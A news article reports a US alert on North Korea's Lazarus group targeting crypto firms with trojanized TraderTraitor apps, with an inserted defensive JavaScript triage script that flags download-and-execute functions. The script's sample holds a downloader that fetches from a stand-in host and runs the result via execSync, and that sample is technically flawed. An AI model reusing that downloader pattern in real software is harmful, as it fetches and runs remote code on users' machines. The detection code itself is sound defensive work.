US warns North Korean Lazarus gang rises against cryptocurrency outfits

The North Korean-based criminal group Lazarus is expanding its attacks into the blockchain and crypto space, three agencies of the US government have warned.

The state-sponsored gang is sending large numbers of spear-phishing messages to employees of cryptocurrency companies on a range of communications platforms that – as with the campaigns against chemical and IT firms – often look like recruitment offers for high-paying jobs, according to an alert this week from the FBI, Cybersecurity and Infrastructure Security Agency (CISA) and the Treasury Department.

These messages are ultimately crafted to entice the mark into running attached malicious software.

“This campaign combines multiple popular trends into an attack,” Tim Erlin, vice president of strategy at cybersecurity firm Tripwire, told The Register.

“The alert from CISA describes a spear-phishing campaign that leverages the hot job market to entice users into downloading malicious cryptocurrency software. We’ve certainly seen attacks focused on cryptocurrency before, and malicious software isn’t new. It’s important that readers understand that this alert isn’t about a new technology, but increased attack activity.”

Specifically, the messages carry trojans encouraging recipients to open and run cryptocurrency-themed malware that the agencies call TraderTraitor.

“The term TraderTraitor describes a series of malicious applications written using cross-platform JavaScript code with the Node.js runtime environment using the Electron framework,” the agencies warn.

“The malicious applications are derived from a variety of open-source projects and purport to be cryptocurrency trading or price prediction tools. TraderTraitor campaigns feature websites with modern design advertising the alleged features of the applications.”

The goal is to get into a victim’s system to spread more malware on the network, steal funds and private keys, and run fraudulent blockchain transactions.

Lazarus – also known as APT38, BlueNoroff, and Stardust Chollima – is casting a wide net with this campaign, with targets including cryptocurrency exchanges, decentralized finance protocols, play-to-earn cryptocurrency video games, and crypto-coin trading companies. Also in the crosshairs are venture capital funds investing in cryptocurrencies and people holding large amounts of cryptocurrency or non-fungible tokens (NFTs).

Within the companies, Lazarus often sends its spear-phishing messages to those working in system administration and DevOps roles.

JavaScript capable of running on Windows and macOS provides the core functionality of the malware; this includes a function with a name like UpdateCheckSync() that downloads and executes malicious payloads. The TraderTraitor apps come with a range of names, such as DAFOM, which purports to be a cryptocurrency portfolio app; TokenAIS and CryptAIS, for building AI-based trading portfolios for cryptocurrencies; and Esilet, for live cryptocurrency prices.
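Defenders triaging a suspected TraderTraitor-style Electron app can look for exactly the pattern the alert describes: a single function that both fetches a remote resource and hands it to an execution primitive. The following is an added illustration, not code from the advisory or from The Register; the regex patterns, the `triage` scoring and the embedded sample source are constructed assumptions, and the approach is a coarse static heuristic for analysts rather than a detection signature.

```javascript
// Added example: static triage of JavaScript bundled in an Electron/Node.js app.
// Flags functions whose body mixes a network fetch with an execution primitive,
// the "download and execute" downloader shape described for TraderTraitor.
// Patterns below are assumptions for illustration, not a vetted signature.

const NETWORK = /\b(https?\.(get|request)|fetch|axios\.(get|post)|net\.connect)\s*\(/;
const EXECUTE = /\b(child_process|spawn(Sync)?|exec(File)?(Sync)?|eval|new Function|vm\.runIn\w+Context)\b/;
const UPDATER_NAME = /\b(update|check|sync)/i; // e.g. UpdateCheckSync, as named in the alert

// Pull out `function name(...) { ... }` declarations by matching braces.
function extractFunctions(src) {
  const out = [];
  const re = /function\s+([A-Za-z_$][\w$]*)\s*\([^)]*\)\s*\{/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    let depth = 1, i = re.lastIndex;
    while (i < src.length && depth > 0) {
      if (src[i] === '{') depth++;
      else if (src[i] === '}') depth--;
      i++;
    }
    out.push({ name: m[1], body: src.slice(re.lastIndex, i - 1) });
  }
  return out;
}

// Score each function: HIGH only when download and execute co-occur in one body.
function triage(src) {
  return extractFunctions(src).map(f => {
    const reasons = [];
    if (NETWORK.test(f.body)) reasons.push('network');
    if (EXECUTE.test(f.body)) reasons.push('execute');
    if (UPDATER_NAME.test(f.name)) reasons.push('updater-like name');
    const both = reasons.includes('network') && reasons.includes('execute');
    const score = both ? 'HIGH' : reasons.length ? 'LOW' : 'NONE';
    return { name: f.name, score, reasons };
  });
}

// Constructed sample: a benign price fetcher next to a downloader-style function.
const SAMPLE = `
function fetchPrices(cb) {
  https.get('https://api.example.invalid/prices', res => cb(res));
}
function UpdateCheckSync() {
  const body = https.get('https://update.example.invalid/pkg', r => r);
  require('child_process').execSync(body);
}
`;

console.table(triage(SAMPLE));
```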

The downloaded payloads include updated variants of the custom remote access trojan (RAT) Manuscrypt for Windows and macOS that collects information and can execute arbitrary commands and download additional payloads like the North Korean CopperHedge RAT.

Horse, meet stable door

Lazarus has been targeting the cryptocurrency market since at least 2020, and last year US government agencies issued an alert about Lazarus’ AppleJeus malware, which has been used to steal cryptocurrency from organizations around the globe. AppleJeus continues to be a problem: Google last month said it stopped efforts by Lazarus to exploit a flaw in Chrome using the malware.

More recently, the FBI said the threat group was responsible for the theft of $620 million in cryptocurrency from the Ronin Network, an Ethereum-based network that supports Axie Infinity, a blockchain video game. The US Treasury also said last week that it was placing fresh sanctions on a Lazarus-controlled Ethereum wallet.

In addition, Uncle Sam last week offered a reward of up to $5 million for information that helps disrupt North Korea’s illicit cyber-activities, including the theft of cryptocurrency as well as cyber-espionage.

In the latest alert, the US agencies wrote that given its history, Lazarus “will likely continue exploiting vulnerabilities of cryptocurrency technology firms, gaming companies, and exchanges to generate and launder funds to support the North Korean regime. North Korean state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest, acquire sensitive cryptocurrency-intellectual property, and gain financial assets.”

The digital asset space has become a tempting target not only for Lazarus but for many other cybercriminals because of its relative newness and the rapid growth in the number of cryptocurrency and NFT users.

“Since cryptocurrency is a rather new technology, it presents an opportunity for threat actors to socially engineer targets,” Hank Schless, senior manager of security solutions at Lookout, told The Register.

“Crypto investors are constantly looking for an edge in the market or for what the next big currency that’s going to explode in value will be. Attackers can use this thirst for information to get users to download malicious apps or share login credentials for legitimate trading platforms they use.”

For North Korea, targeting cryptocurrency and similar assets will continue, John Bambenek, principal threat hunter at Netenrich, told The Register.

“North Korea has been focused on cryptocurrency threats for years because they are a highly-sanctioned country and this lets them acquire assets they can use to further their governmental objectives,” Bambenek said.

“This will continue until North Korea becomes a respectable member of the international community or the sweet meteor of death finally comes and ends all life on earth. The latter is the more accurate scenario.” ®